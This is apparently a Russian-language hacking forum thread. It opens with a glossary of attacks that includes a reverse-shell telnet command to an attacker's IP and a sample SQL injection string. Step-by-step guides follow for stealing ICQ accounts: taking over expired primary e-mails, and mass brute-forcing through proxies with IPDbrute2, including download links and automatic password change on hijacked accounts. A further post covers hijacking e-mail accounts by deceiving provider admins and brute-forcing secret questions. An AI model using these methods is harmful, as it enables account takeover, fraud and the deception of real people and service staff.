21)  Подбор пароля. Используется для регистрации в системе путём подбора пароля к учётной записи. Есть два вида: подбор всех возможных комбинаций символов (BruteForce) и подбор по словарю. Первый способ более эффективен, т.к. всё равно найдётся комбинация символов, которую вы ввели с клавиатуры в качестве пароля, но этот способ крайне медленный, особенно если в расчёт принимаются знаки препинания и т.п. Второй способ быстрый, но если вы ввели слово, которого не может быть в словаре, например: «Мой-Новый-Пароль», то подобрать по словарю его будет невозможно. Программ, которые служат для подбора пароля очень много, поэтому мы не думаем, что есть смысл называть какие-либо конкретные. Как правило, программы, ОС и пр. хранят пароли в шифрованном виде, поэтому даже если взломщик получил доступ к файлу, ему придётся расшифровать пароль. Он это может делать сутками на своём домашнем компьютере.

Рекомендации: использовать сложные пароли, лучше со знаками препинания. Ограничьте  количество попыток ввода пароля. Против расшифровки пароля поможет только его сложность.

22)  Back Connect/Pipes/Reverse (Обратный сеанс или Реверс). Это вспомогательный приём, но сам по себе он очень интересный. Например, взломщик не хочет каждый раз выполнять много действий ради одной команды. Он может упростить задачу, используя этот приём. Суть его в том, что взломщик вынуждает атакуемый компьютер подключиться к компьютеру взломщика. Например на атакуемом компьютере можно выполнить команду telnet [ip.адрес.взломщика] [порт]. После этого взломщик, по сути дела получает командную строку (командную оболочку или Шелл/Shell) на атакуемом компьютере.

23)  Software vulnerabilities (Ошибки ПО). Использование ошибок в программном обеспечении. Эффект может быть разный. От получения несущественной информации до получения полного контроля над системой. Атаки через ошибки ПО самые популярные во все времена. Старые ошибки исправляются новыми версиями, но в новых версиях появляются новые ошибки, которые опять могут быть использованы. Дальше мы опишем не виды атак, а приёмы, используемые для атаки на ошибки ПО. Рекомендации: приведём сразу для всех, потому как рекомендация общая - поможет только «безопасно» написанный код программ. По этой теме можно найти большое количество материала в Интернет.

24)  Buffer Overflow (Переполнение буфера). Очень опасный вид атаки, когда запрос формируется так, что он переполняет выделенные ему рамки памяти и команды «вшитые» в запрос попадают в стек, а после выполняются процессором. Это можно сделать как удалённо, так и локально, если взломщик может запустить свою программу на атакуемом компьютере. Это может быть использовано как для выполнения кода на компьютере, так и для поднятия прав. Есть несколько подвидов атак на переполнение буфера. Мы не будем описывать каждый из них, т.к. для объяснения принципа нам придётся привести примеры кода, который будет непонятен людям, незнакомым с программированием. Нижеприведённая классификация принадлежит Андрею Колищаку (andr[at]sandy.ru) и находится в его статье «Атаки на переполнение буфера». Поэтому найти их описание, примеры и рекомендации Вы можете непосредственно в этой статье. Мы же приведём их просто для ознакомления.

a)      Атака “срыв стека”     
b)      Атака “срыв стека” с параметризацией   
c)      Атака “срыв стека” с передачей управления 
d)      Искажение указателей функций   
e)      Атака на указатели функций   
f)        Атака на указатели функций с параметризацией   
g)      Атака на указатели функций с передачей управления 
h)      Искажение таблиц переходов   
i)        Атака на таблицы переходов   
j)        Атака на таблицы переходов с параметризацией     
k)      Атака на таблицы переходов с передачей управления 
l)        Искажение указателей данных   
m)    Атака с искажением указателей данных   
n)      Атака с искажением указателей данных с параметризацией   
o)      Атака с искажением указателей данных с оригинальным кодом.
К вышеприведённой классификации мы бы хотели привести ещё один тип: Integer Overflow (Переполнение целочисленных). За более подробной информацией можно обратиться к статье «Целочисленное переполнение: Атака» и «Целочисленное переполнение: Защита» или «Basic Integer Overflows» от Blexim.

25)  Shatter – Уязвимость Windows систем, которая может быть использована только локально. Очень похожа на переполнение буфера, точнее приводит к тому же самому результату: команды взломщика попадают в стек. Основана на том, что у каждого окна в Windows, у которого есть поле для ввода, есть и максимальная длина вводимого значения. Она устанавливается ещё на стадии разработки программы и для небольших полей может быть равна, например 50. С клавиатуры нельзя ввести количество символов больше 50, но работа окон Windows основана на Messages (Посланиях). Можно легко получить Header (Хидер или Заголовок(особый, предназначенный только для ОС)) поля для ввода и послать SETTEXT (установить текст) сообщение (используя этот хидер) полю для ввода. Сообщение должно сказать, что необходимо установить текст длиною больше 50, соответственно, всё, что будет после 50-го символа, попадёт в стек и будет выполнено процессором. Защиты от этого не существует. Единственная панацея – это процессоры AMD Athlon 64, у которых есть встроенная защита, и они не выполняют команды из стека.

26)  Nuke (WinNuke или Нюк). Сейчас это скорее история. Windows по умолчанию использует протокол NetBIOS для совместной работы с файлами и принтерами в сети. Для этого ОС открывает три TCP порта (137, 138, 139). Реализация этого протокола на старых версиях Windows содержала уязвимость. Суть в том, что можно послать в открытый 139 порт несколько OutOfBand «сообщений» подряд. Система не могла корректно обработать подобные данные и система повисала. Программ для подобных атак было написано немало, но мы упомянем только Shadow Security Scanner, который уже был назван нами ранее, как средство для SSPing.

27)  Cross User Attack (межпользовательская атака). На наш взгляд достаточно неоднозначное название, т.к. не лучшим образом отражает суть атаки, но всё же мы придержимся этого, общеизвестного названия. Squid 2.4 и ISA/2000 позволяют пользователям делить между собой TCP соединения с сервером. Можно спровоцировать с помощью HRS (описана ниже) два ответа от сервера, один из которых будет контролироваться взломщиком и фальсифицирует полученную пользователем информацию.

28)  Атака на CGI. Большинство WWW (Веб) серверов используют скрипты для предоставления пользователям дополнительных услуг или предоставления дополнительных возможностей. Например, почтовые сервера, как mail.ru На многих серверах установлены «самописные» CMS (Content Management System или Системы управления содержимым (сайта)). Программисты далеко не всегда заставляют свои скрипты проверять вводимые пользователем значения, отчего появляются возможности использования таких оплошностей в различных целях. Атака на переполнение буфера также может быть проведена через ошибки CGI скриптов. Например: http://host/cgi-bin/helloworld?type=A*100 (т.е. буква A будет в количестве 100 раз). По адресу http://www.opennet.ru/base/sec/linux_sec_guide.txt.html можно найти отличную статью, во второй части которой описываются проблемы безопасности, которые обычно оставляются без внимания CGI программистами. Многие не являются приёмами взлома, а только помогают взлому, поэтому для написания хорошего кода лучше ознакомиться со статьёй. Рамки нашей статьи не позволяют нам углубиться в тему написания безопасного кода, поэтому скажем только, что нужно, как минимум, фильтровать все служебные символы из получаемых данных.

29)  SQL Injection (SQL иньекция). Если введённые пользователем данные используются в сформированных SQL запросах без проверки, то взломщик может ввести данные, которые позволят ему получить любую информацию из Ваших SQL баз. Например: есть запрос «SELECT login, password FROM members where email=’$email’;» Где $email вводится пользователем в таблице, запрос обрабатывается и результат выводится на страницу. Взломщик может модифицировать данные и ввести в форму: «my@mail.ru' OR login LIKE '%admin%». Таким образом, сформированный SQL запрос будет: «SELECT login, password FROM members where email='my@mail.ru' OR login LIKE '%admin%';». Таким образом, взломщик получит пароли от пользователей, в login которых содержится admin.

30)  HRS (HTTP Resource Splitting) – Достаточно молодой и по нашему мнению сложный приём (если не использовать его только для XSS), который позволяет реализовать атаки вида Hijacking Pages, Cross User Defacement, Web Cache Poisoning, Browser Cache Poisoning, XSS (будут описаны ниже). Сущность атаки в том, что взломщик, специально приготовленным HTTP запросом может заставить Веб-сервер, уязвимый перед HRS, ответить жертве (а не взломщику) двумя раздельными HTTP ответами (а не одним, как это было бы в обычной ситуации). Первый HTTP ответ может быть частично контролируем взломщиком, но второй контролируется взломщиком полностью! Если это возможно, взломщик посылает два запроса, где жертва выступает уже посредником. Первый из этих запросов снова заставит Веб-сервер ответить два раза, а второй обычно запрашивает какой-либо второстепенный ресурс на сервере (например, какую-либо маленькую картинку). Но! Жертва объединит второй HTTP запрос (на второстепенный ресурс) со вторым HTTP ответом (который контролируется взломщиком)! Таким образом, жертва думает, что получившийся «агрегат» это ответ от Веб-сервера с частью его содержимого, но на самом деле это будет важная информация или команда (которая подготовлена взломщиком). Есть ещё один нюанс, жертвой может быть компьютер взломщика, который получит в результате атаки, важную информацию, например, cookie другого пользователя. Ниже мы опишем атаки, которые можно провести через HRS, но они так же могут быть проведены с использованием другого приёма, но мы скажем про них всё же в ключе HRS.

31)  Cross User Defacement – Достаточно «узкий» приём, потому что взломщик подделывает страницу, которая посылается уязвимым Веб – сервером только одной жертве. При этом содержимое Веб – сервера никаким образом не меняется. Кроме этого, приём очень сложно провести не при помощи HRS. Взломщику придётся выступить посредником между клиентом и сервером при помощи Спуфинга, IP хайджека, или ошибки в реализации некоторых Веб-серверов, но в итоге «затраты» не оправдают полученного результата. Более легко реализовать это через межпользовательскую атаку.

32)  Web Cache Poisoning – по нашему мнению, не совсем полезный приём, поэтому опишем его исключительно кратко. В основном, прокси серверы кэшируют страницы, запрашиваемые пользователями, чтобы при повторном запросе такой страницы отдать её из кэша, а не запрашивать Веб-сервер. Это необходимо для экономии трафика, если это корпоративная сеть и прокси сервер внутрисетевой. Суть приёма в том, чтобы спровоцировать прокси сервер кэшировать поддельную страницу, которая потом будет передаваться пользователям сети.

33)  Browser Cache Poisoning. Кэши есть не только у прокси серверов, но также и у браузеров. По сути этот приём почти то же самое, что и Web Cache Poisoning, с той лишь разницей, что ей подвергается только один компьютер.

0

6

Ipdbrute биг фак или как угнать асю?

Надоело сидеть на длиннющем кривом слоне? Так в чем проблема утяни себе короткий уин и покажи всему инету на сколько ты крут!
С чего мы начнем? Наверно для тебя уже не секрет что шестизначные уины регились очень давно и тогда при регистрации вписывать мыло (которое кличут праймари) было обязательно. Вот. На это мыло пароль будет приходить всегда Делаем вывод, что у каждого шести и семи-значного уина есть праймари на который ты сорвешь пароль. Вроде понятно, а вроде как вообще ничего не понятно. Так вот, многие (наверное 90% имхо) мыл регились на бесплатных серваках, а там существуют свои правила. Например если ты не пользуешся своим ящиком (например на hotmail.com) больше трех месяцев то твое мыло становится свободным и любой его может зарегить и юзать. Ну и если на это мыло зареген уин, то он и уин будет юзать. Вот так вот и получается...Кто-то забыл о своем мыле (на которое регил свой уин) кто-то вводил несуществующее мыло например eprst@hotmail.com , кто-то ушел в плаванье и не юзал мыло. В общем, оно свободно, ты просто его региш. Потом быстренько бежишь на https://web.icq.com/secure/password/ и высылаешь себе пароль. Вроде все ясно как день, но ты меня спросишь, а откуда я знаю, на какие ящики регились такие-то номера? Я тебе скажу. Хорошие люди собрали и выложили в сеть базы примари. Выглядит так уин - праймари. То есть ты уже знаешь на какое мыло зареген такой то уин. Утянуть эти базы можно тут http://yozhik.xploit.ru/db/. Но, как видишь, базы не маленькие, по 5-10 метров. Поэтому руками проверить все мылы на валидность не получится. Но тебе поможет программа Advanced Maillist Verify скачать и почитать описание можно тут http://www.massmail.ru/amv/ кряк найдешь сам :) С помощью этой программки ты узнаешь, какой майл из твоего списка существует, а какой - нет. Но дело в том, что некоторые мыльные сервера кое-что там изменили у себя, поэтому на хотмыле и помоему мсне эта прога не рулит. В общем это я описал один способ угона уина который становится все менее актуален но до сих пор рулит. Так как люди вумные пишут подобные проги, которые реально все проверяют. Но просят за это деньги.

А сейчас перейдем к самому имхо реальному способу угона аськи! К IPDbrute2/udc2 Pro.
Вот как он выглядит.

1)Threads - Это количество потоков подбора пароля. Че мелочиться? Ставте 100! (хотя реальное число одновременно открытых сокетов в системе - ограничено)
Alive - Количество потоков подбора пасса в данный момент.
2)Password remains Сколько паролей ему еще предстоит проверить.
bad - Это уже проверенные пароли которые попадают в отстой, не валидные они.
good - Это ваш скажем так улов, правильные пароли, то, что вы набрутили!
3)Proxies - Количество прокси-серверов, которые вы заливали, good - рабочии прокси, alive те прокси, что используются в данный момент.
3)Speed pps(Password Per Second)Cколько паролей проверяется в секунду. У меня, как видели 10, в общем чем выше скорость, тем, разумеется, лучше.
В общем с общим видом мы ознакомились а теперь приступим к настройкам.
Надеюсь, брутфорс вы уже скачали? Если нет, то качайте тут http://antichat.ru/soft/IPDbrute2.zip и вам еще понадобится Программа для генерации списков вида UIN;password берем его тут http://antichat.ru/soft/Generator.zip Так теперь создаем у себя на винте папку условно назовем ее "icqhack" в нее кидай генератор и брутфорс. Так. Теперь создаем четыре текстовых документа. Один для проксей (так и называем его "proxy") второй для валидных паролей, назовем его например "zaebis!" туда будут лететь набрученые вами аськи. И третий документ в котором будут генерированные уины (с которого будет реализовываться сканирование) условно назовем его "uinfuck" Четвертый текстовик - назовем его "bad", туда будут сливаться не правильные пароли. И для желающих можно создать еще один документ с паролями (я так делаю всегда) Делаем текстовик, называем его pass и кидаем туда буквально три пароля. И увеличиваем свои шансы в трое, но этим мы уменьшаем диапазон уинов, которые мы должны просканить, но это не важно. Итак, запускаем генератор.

1)Диапазон который будет генерить, у меня стоит по умолчанию, Вы пишите свой.
2)password это по умолчанию. Не забудьте поменять на свой например 1221 и у вас получится
уин;1221
уин;1221
уин;1221 И так далее...То есть Вы будете подбирать уин под пароль 1221.*это пример пароля, юзайте свои* Как думаете, из несколько десятков тысяч уинов, хоть на одном будет стоять такой пароль? Хех конечно, суть улавливаете?!
Это один способ генерации. Но, как Вы заметили, на скрине есть еще циферка три возле надписи словарь. Помните, мы создали документ под названием pass? Вот пишем в него три каких то пароля, больше не надо. Пример 111222 222111 112211 вписали, терь вот что делаем: ставим галочку где написано "словарь"

Как видно из скрина, Вы даете путь на ваш словарь и теперь и после генерации у вас вот что получается:
147852;111222
147852;222111
147852;112211
147853;111222
147853;222111
147853;112211
Фишку поняли? Теперь уин подбирается не к одному паролю, как мы делали выше, а к трем! Но придется сканить меньший диапозон. Поэтому решайте сами... Итак, с генерилкой думаю разобрались, теперь будем настраивать сам брутфорс.
Значит открываем его и нажимаем кнопочку - Config

1)Source uin;pass list file - Путь к текстовому документы куда слились ваши уин;пасс если я не ошибаюсь мы называли его "uinfuck" ну вы поняли :)
2)Threads - Кол-во потоков, о которых мы говорили выше. Ставьте 100
3)Dump incorrect passwords to this file даем путь к текстовику "bad", в который будут сваливаться неправильные пароли.
4)Dump correct passwords to this file - мы его по-моему называли "zaebis" даем на него путь и сюда будут сваливаться ваши честно угнанные уины. Правильные сочетания уин пасс в общем.
5)Proxies list file - Помните, мы создавали текстовик под названием "proxy"? Вот на него и даем путь потому что брутус работает через прокси, иначе мираблы вас забанят.(Совсем забыл сказать в текстовик "proxy" нужно залить прокси. Взять их можно на http://antichat.ru/proxy
6)Cleanup every XX minutes - как вы знаете, прокси умеют умирать и тем самым уменьшать скорость сканирования. Поэтому тут выставляем промежутки времени через которые программа будет "чистить", удалять плохие прокси. Это можно сделать и руками зайдя сюда http://www.ifud.ru/index.php?page=proxies
7) Change password - как только попадется правильное сочетание уин пасса программа автоматически поменяет на нем пароль. Удобно.
Теперь жмем OK и нажимаем start.
Удачного брута!

0

7

Взлом мыла

Один из самых простых
Пишите владельцу мыла какое нить письмо, все равно с каким содержанием, но лишь бы хозяин мыла ответил. Если это какой нить "чудо-крутой хакер", то что нить типа: "Слушай, а ты в натуре можешь сайт сломать??? http://www.microsoft.com/ не твоя работа???" и так далее в этом духе...;-) Если Веб-мастер, то что нить типа: "Мне так нравится как ты пишешь! А у тебя JAVA-скрипта нету, что б он там что то делал???"...По фигу ЧТО, главное что б от него назад ответ пришел. В принципе эта вся процедура была только для того, что б узнать ИМЯ_ФАМИЛИЮ (или ник) и место расположения "клиента". То бишь если по ентому мылу находится аська, то смотрим инфу в аське, город (если не прописан в аське, то по ИП), имя, возраст и зип. Потом пишешь админу мыльного сервака (у любой мыльной системы есть админ, и у 99% www-шные сервера), обычно это адреса admin@provider.com и support@provider.com. Так вот... Пишешь письмо (очень желательно через www-браузер, например от wwwmail.ru или wwwhotmail.com) и через анонимную проксю. Это для того что б в заголовке пакета был ИП прокси. Так.... для секьюрити... ;-) Так вот. В теле письма пишешь, что так и так... Злобные хакеры украли у тебя мыло, а тебе очень нравится их служба, сервис, скорость работы, безглючность и все такое... Что ты никогда не променяешь ихний сервис, и что они вообще самые крутые мыльщики! Указываешь ИМЯ, ФАМИЛИЮ, ЗИП, ГОРОД, Телефон (от балды) или что они там еще просят.... Ессено назад придет письмо, что "Информация не совпадает с введенной при регистрации и все такое...". Но ты будь настойчивей! Пиши назад, что ТО_ЧТО_ТЫ_ИМ_ВЫДАЕШЬ - ЕДИНСТВЕННАЯ ВЕРНАЯ ИНФОРМАЦИЯ о ТВОЕМ аккаунте! И повторяешь им ту же инфу, что и первый раз. И так пока админ не сломится...но не забывай каждый раз расхваливать их сервис! ;-) Обычно раз на 7-10 прокатывает... ;-) У меня был даже раз случай, когда один буржуйский админ "отдал" мне мыло, где (как потом оказалось) инфа прописанная в мыле ВООБЩЕ не соответствовала той что я ему ВЫДАВАЛ якобы за владельца аккаунта! Так что дерзайте, тут главное БОЛЬШЕ фантазии и упорства! Но и о безопасности не забывайте!
Второй способ
Посложнее, но все равно общедоступный. Почти в каждом мыльном сервисе есть служба что типа "Foggot Password?" Так вот...Заходим туды (предварительно не забыв изменить атрибуты филе cookie_для_этой_службы на ReadOnly). Там обычно ОЧЕНЬ простые вопросы... Если повезет , то вопрос будет (к примеру на мыло.ру) "В каком городе ты родился"? В первом способе описано как узнавать город юзверя по мылу , так что на этом не бум останавливаться .Ну и вопросы бывают "кустомайзские"- типа "2000" , ответ обычно такойже..;-) А вот если что нить типа "Как зовут мою собаку?" , то читай ниже... Открываем эту страницу (ну где вводить надо ответ на секретный вопрос , не догоняешь что ль???;-)) итам в HTML-просмотре ищем строчкутипа : form action="/cgi-bin/3970.dll?secquest" итд... Так вот... Если урл мыла http://www.mail.ru , то полный урл места куда отправляется"секретный ответ" будет http://www.mail.ru/cgi-bin/3970.dll?secquest. Этот урл вводишь вместе с индефикатором Вопроса в программу типа WWWHack. Идентификатор вопроса находится там же где и form action="/cgi-bin/3970.dll?secquest, только чуть дальше . Потом в эту программу или загружаешь встроенный wordlist c паролями или пишешь свой по конкретной тематике, это зависит от вопроса . И вперед! Запускаешь и ждешь... Так что тут тоже нужно терпение и хоть базовые знания HTML.

0

8

ПРИВЕТ ГАНИБАЛ ТОЛЬКО ЧТО ЗАРЕГЕСТРИРОВАЛСЯ,МОЖЕШЬ ПОСОВЕТОВАТЬ ЧТО ДЛЯ НАЧАЛА  НУЖНО?ЧТОБ СТАТЬ ХАКЕРОМ...

0

9

КИСЛОТНЫЙ ОЖОГДля начало нужно прочетать все статьи и определиться чем ты будешь промышлять

0


Вы здесь » Fantom » Взлом » Взлом (разное)